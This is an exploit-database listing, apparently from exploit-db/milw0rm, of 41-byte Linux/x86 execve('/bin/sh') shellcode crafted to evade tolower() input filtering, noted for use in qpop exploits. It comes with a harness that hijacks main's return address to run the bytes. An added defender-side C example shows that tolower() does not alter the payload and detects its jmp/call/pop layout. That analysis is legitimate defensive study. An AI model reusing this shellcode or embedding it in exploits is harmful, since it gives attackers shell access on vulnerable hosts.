Linux/x86 – execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Vulnerability ID: 1054602 | Vulnerability type:
Published: 2004-09-12 | Updated: 2004-09-12
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux_x86 | CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13457
|Details
Vulnerability details have not been disclosed.
|Exploit code
/*
 *  Linux/x86
 *  tolower() evasion, execve() /bin/sh 
 *  (eg use: various qpop exploits)
 */

#include <stdio.h>
#include <string.h>

char c0de[] =
/* main: */
"\xeb\x1b"                                   /* jmp callz                  */
/* start: */
"\x5e"                                       /* popl %esi                  */
"\x89\xf3"                                   /* movl %esi, %ebx            */
"\x89\xf7"                                   /* movl %esi, %edi            */
"\x83\xc7\x07"                               /* addl $0x07, %edi           */
"\x29\xc0"                                   /* subl %eax, %eax            */
"\xaa"                                       /* stosb %al, %es:(%edi)      */
"\x89\xf9"                                   /* movl %edi, %ecx            */
"\x89\xf0"                                   /* movl %esi, %eax            */
"\xab"                                       /* stosl %eax, %es:(%edi)     */
"\x89\xfa"                                   /* movl %edi, %edx            */
"\x29\xc0"                                   /* subl %eax, %eax            */
"\xab"                                       /* stosl %eax, %es:(%edi)     */
"\xb0\x08"                                   /* movb $0x08, %al            */
"\x04\x03"                                   /* addb $0x03, %al            */
"\xcd\x80"                                   /* int $0x80                  */
/* callz: */
"\xe8\xe0\xff\xff\xff"                       /* call start                 */
/* DATA */
"/bin/sh";

/*
 * Test harness: points main()'s saved return address at c0de, so control
 * reaches the byte string when main() returns. This relies on the 32-bit
 * stack layout of compilers of the period.
 */
int main(void) {
        int *ret;
        ret=(int *)&ret +2;
        printf("Shellcode length=%zu\n",strlen(c0de));
        (*ret) = (int)c0de;
}

// milw0rm.com [2004-09-12]
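
Added example, not part of the original listing: a defender-side check showing that none of the 41 bytes above falls in 0x41..0x5A, so a tolower() pass on input leaves them untouched and is not a sanitization step, together with a heuristic that flags the jmp/call/pop layout the listing labels main, start and callz. The function names are hypothetical and chosen for this illustration; the sample array is the byte sequence from the listing, held as inert data.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Sample input: the 41 bytes from the listing above, held as inert data. */
static const unsigned char sample[] = {
    0xeb,0x1b,0x5e,0x89,0xf3,0x89,0xf7,0x83,0xc7,0x07,0x29,0xc0,0xaa,0x89,
    0xf9,0x89,0xf0,0xab,0x89,0xfa,0x29,0xc0,0xab,0xb0,0x08,0x04,0x03,0xcd,
    0x80,0xe8,0xe0,0xff,0xff,0xff,'/','b','i','n','/','s','h'
};

/* Count bytes a C-locale tolower() pass would rewrite ('A'..'Z'). */
size_t folded_by_tolower(const unsigned char *b, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (b[i] >= 'A' && b[i] <= 'Z')
            hits++;
    return hits;
}

/* Heuristic (hypothetical helper): a forward short jmp (EB rel8) landing on
 * a call (E8 rel32) that returns to the byte right after the jmp, where a
 * pop r32 (58..5F) sits. Returns the jmp offset, or -1 if absent. */
long find_jmp_call_pop(const unsigned char *b, size_t n)
{
    for (size_t i = 0; i + 2 < n; i++) {
        if (b[i] != 0xeb || b[i + 1] >= 0x80)
            continue;
        size_t call = i + 2 + b[i + 1];
        if (call + 5 > n || b[call] != 0xe8)
            continue;
        uint32_t rel = b[call + 1] | (uint32_t)b[call + 2] << 8 |
                       (uint32_t)b[call + 3] << 16 | (uint32_t)b[call + 4] << 24;
        uint32_t target = (uint32_t)(call + 5) + rel;   /* wraps mod 2^32 */
        if (target == i + 2 && (b[i + 2] & 0xf8) == 0x58)
            return (long)i;
    }
    return -1;
}

int main(void)
{
    printf("bytes tolower() would change: %zu\n",
           folded_by_tolower(sample, sizeof sample));
    printf("jmp/call/pop at offset: %ld\n",
           find_jmp_call_pop(sample, sizeof sample));
    return 0;
}
```

The range test is used instead of calling tolower() so the result does not depend on the process locale.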
